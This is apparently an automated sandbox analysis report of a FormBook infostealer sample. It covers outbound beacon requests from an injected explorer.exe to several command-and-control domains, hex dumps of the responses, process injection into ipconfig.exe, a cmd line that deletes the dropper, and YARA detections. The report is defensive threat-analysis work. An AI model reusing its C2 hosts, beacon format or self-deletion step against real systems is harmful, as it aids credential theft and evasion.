61 69 6e 65 72 20 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 35 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 34 70 78 3b 7d 20 0a 6c 65 67 65 6e 64 2e 6e 6f 2d 65 78 70 61 6e 64 2d 61 6c 6c 7b 70 61 64 64 69 6e 67 3a 32 70 78 20 31 35 70 78 20 34 70 78 20 31 30 70 78 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 2d 31 32 70 78 3b 7d 20 0a 6c 65 67 65 6e 64 7b 63 6f 6c 6f 72 3a 23 33 33 33 33 33 33 3b 3b 6d 61 72 67 69 6e 3a 34 70 78 20 30 20 38 70 78 20 2d 31 32 70 78 3b 5f 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 70 78 3b 20 0a 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 65 6d 3b 7d 20 0a 61 3a 6c 69 6e 6b 2c 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 30 30 37 45 46 46 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 7d 20 0a 61 3a 68 6f 76 65 72 7b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 7d 20 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 20 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0a 68 34 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 35 70 78 20
                                                                  Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>IIS 8.5 Detailed Error - 404.0 - Not Found</title> <style type="text/css"> ... body{margin:0;font-size:.7em;font-family:Verdana,Arial,Helvetica,sans-serif;} code{margin:0;color:#006600;font-size:1.1em;font-weight:bold;} .config_source code{font-size:.8em;color:#000000;} pre{margin:0;font-size:1.4em;word-wrap:break-word;} ul,ol{margin:10px 0 10px 5px;} ul.first,ol.first{margin-top:5px;} fieldset{padding:0 15px 10px 15px;word-break:break-all;} .summary-container fieldset{padding-bottom:5px;margin-top:4px;} legend.no-expand-all{padding:2px 15px 4px 10px;margin:0 0 0 -12px;} legend{color:#333333;;margin:4px 0 8px -12px;_margin-top:0px; font-weight:bold;font-size:1em;} a:link,a:visited{color:#007EFF;font-weight:bold;} a:hover{text-decoration:none;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.4em;margin:10px 0 0 0;color:#CC0000;} h4{font-size:1.2em;margin:10px 0 5px


                                                                  Session ID:6
                                                                  Source IP:192.168.2.6
                                                                  Source Port:49762
                                                                  Destination IP:103.138.88.11
                                                                  Destination Port:80
                                                                  Process:C:\Windows\explorer.exe
                                                                  Timestamp:Jul 22, 2021 17:44:09.256103992 CEST
                                                                  kBytes transferred:10427
                                                                  Direction:OUT
                                                                  Data:GET /dy8g/?i0GDM=uor47PkOoKkLY099HuArMxw1XFE/ncsTlzCE/ODY21NzZk1xVsb5QvrTgLDn7S7AYBCRuXEk2w==&0X=C6Ah3vPx HTTP/1.1
                                                                  Host: www.okinawarongnho.com
                                                                  Connection: close
                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                  Data Ascii:
                                                                  Timestamp:Jul 22, 2021 17:44:09.556632996 CEST
                                                                  kBytes transferred:10427
                                                                  Direction:IN
                                                                  Data:HTTP/1.1 404 Not Found
                                                                  Server: nginx
                                                                  Date: Thu, 22 Jul 2021 15:42:19 GMT
                                                                  Content-Type: text/html; charset=iso-8859-1
                                                                  Content-Length: 203
                                                                  Connection: close
                                                                  Vary: Accept-Encoding
                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 64 79 38 67 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /dy8g/ was not found on this server.</p></body></html>


                                                                  Session ID:7
                                                                  Source IP:192.168.2.6
                                                                  Source Port:49763
                                                                  Destination IP:162.241.62.54
                                                                  Destination Port:80
                                                                  Process:C:\Windows\explorer.exe
                                                                  Timestamp:Jul 22, 2021 17:44:14.927139997 CEST
                                                                  kBytes transferred:10428
                                                                  Direction:OUT
                                                                  Data:GET /dy8g/?i0GDM=q7jKWIuNsoGkf7/hAqyN1U3v/GjJJAAs8Ri7ihl8JZVwqZwISrlxTPDImUVNZCFSYJzAIvZikA==&0X=C6Ah3vPx HTTP/1.1
                                                                  Host: www.jorgeporcayo.com
                                                                  Connection: close
                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                  Data Ascii:
                                                                  Timestamp:Jul 22, 2021 17:44:15.720453024 CEST
                                                                  kBytes transferred:10429
                                                                  Direction:IN
                                                                  Data:HTTP/1.1 200 OK
                                                                  Date: Thu, 22 Jul 2021 15:44:15 GMT
                                                                  Server: Apache
                                                                  Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                  Cache-Control: no-cache, must-revalidate, max-age=0
                                                                  Retry-After: 86400
                                                                  Upgrade: h2,h2c
                                                                  Connection: Upgrade, close
                                                                  Vary: Accept-Encoding
                                                                  Accept-Ranges: none
                                                                  Transfer-Encoding: chunked
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Data Raw: 39 31 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 20 69 73 20 75 6e 64 65 72 20 63 6f 6e 73 74 72 75 63 74 69 6f 6e 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4d 6f 76 69 6d 69 65 6e 74 6f 20 70 65 72 73 6f 6e 61 6c 20 79 20 73 6f 63 69 61 6c 22 20 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 67 65 6e 65 72 61 74 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 46 72 65 65 20 55 6e 64 65 72 43 6f 6e 73 74 72 75 63 74 69 6f 6e 50 61 67 65 20 70 6c 75 67 69 6e 20 66 6f 72 20 57 6f 72 64 50 72 65 73 73 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 39 30 30 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 6a 6f 72 67 65 70 6f 72 63 61 79 6f 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 75 6e 64 65 72 2d 63 6f 6e 73 74 72 75 63 74 69 6f 6e 2d 70 61 67 65 2f 74 68 65 6d 65 73 2f 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2e 6d 69 6e 2e 63 73 73 3f 76 3d 33 2e 
38 33 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 6a 6f 72 67 65 70 6f 72 63 61 79 6f 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 75 6e 64 65 72 2d 63 6f 6e 73 74 72 75 63 74 69 6f 6e 2d 70 61 67 65 2f 74 68 65 6d 65 73 2f 63 73 73 2f 63 6f 6d 6d 6f 6e 2e 63 73 73 3f 76 3d 33 2e 38 33 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 6a 6f 72 67 65 70 6f 72 63 61 79 6f 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 75 6e 64 65 72 2d 63 6f 6e 73 74 72 75 63 74 69 6f 6e 2d 70 61 67 65 2f 74 68 65 6d 65 73 2f 6d 61 64 5f 64 65 73 69 67 6e 65 72 2f 73 74 79 6c 65 2e 63 73 73 3f 76 3d 33 2e 38 33 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74
                                                                  Data Ascii: 91c<!DOCTYPE html><html lang="en"> <head> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1"> <title> is under construction</title> <meta name="description" content="Movimiento personal y social" /> <meta name="generator" content="Free UnderConstructionPage plugin for WordPress"> <link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Roboto:400,900"> <link rel="stylesheet" href="http://www.jorgeporcayo.com/wp-content/plugins/under-construction-page/themes/css/bootstrap.min.css?v=3.83" type="text/css"><link rel="stylesheet" href="http://www.jorgeporcayo.com/wp-content/plugins/under-construction-page/themes/css/common.css?v=3.83" type="text/css"><link rel="stylesheet" href="http://www.jorgeporcayo.com/wp-content/plugins/under-construction-page/themes/mad_designer/style.css?v=3.83" type="text/css"><link rel="stylesheet" href="htt


                                                                  Code Manipulations

                                                                  Statistics

                                                                  Behavior

                                                                  System Behavior

                                                                  General

                                                                  Start time:17:42:10
                                                                  Start date:22/07/2021
                                                                  Path:C:\Users\user\Desktop\v8kZUFgdD4.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:'C:\Users\user\Desktop\v8kZUFgdD4.exe'
                                                                  Imagebase:0x400000
                                                                  File size:188889 bytes
                                                                  MD5 hash:57F3AE2842FFB5CEEA386D0B97A52818
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.341137782.00000000021D0000.00000040.00000001.sdmp, Author: Joe Security
                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.341137782.00000000021D0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.341137782.00000000021D0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                  Reputation:low

                                                                  General

                                                                  Start time:17:42:10
                                                                  Start date:22/07/2021
                                                                  Path:C:\Users\user\Desktop\v8kZUFgdD4.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:'C:\Users\user\Desktop\v8kZUFgdD4.exe'
                                                                  Imagebase:0x400000
                                                                  File size:188889 bytes
                                                                  MD5 hash:57F3AE2842FFB5CEEA386D0B97A52818
                                                                  Has elevated privileges:true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.389518635.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.389518635.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.389518635.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.389832598.00000000009F0000.00000040.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.389832598.00000000009F0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.389832598.00000000009F0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.389732615.00000000005B0000.00000040.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.389732615.00000000005B0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.389732615.00000000005B0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000001.339035509.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000001.339035509.0000000000400000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000001.339035509.0000000000400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation: low

General

Start time: 17:42:15
Start date: 22/07/2021
Path: C:\Windows\explorer.exe
Wow64 process (32bit): false
Commandline: C:\Windows\Explorer.EXE
Imagebase: 0x7ff6f22f0000
File size: 3933184 bytes
MD5 hash: AD5296B280E8F522A8A897C96BAB0E1D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 17:42:34
Start date: 22/07/2021
Path: C:\Windows\SysWOW64\ipconfig.exe
Wow64 process (32bit): true
Commandline: C:\Windows\SysWOW64\ipconfig.exe
Imagebase: 0x13e0000
File size: 29184 bytes
MD5 hash: B0C7423D02A007461C850CD0DFE09318
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.599150521.0000000001330000.00000004.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.599150521.0000000001330000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.599150521.0000000001330000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.597969689.0000000000EA0000.00000040.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.597969689.0000000000EA0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.597969689.0000000000EA0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.598432080.0000000001100000.00000040.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.598432080.0000000001100000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.598432080.0000000001100000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation: moderate

General

Start time: 17:42:38
Start date: 22/07/2021
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: /c del 'C:\Users\user\Desktop\v8kZUFgdD4.exe'
Imagebase: 0x2a0000
File size: 232960 bytes
MD5 hash: F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 17:42:39
Start date: 22/07/2021
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff61de10000
File size: 625664 bytes
MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

Disassembly

Code Analysis
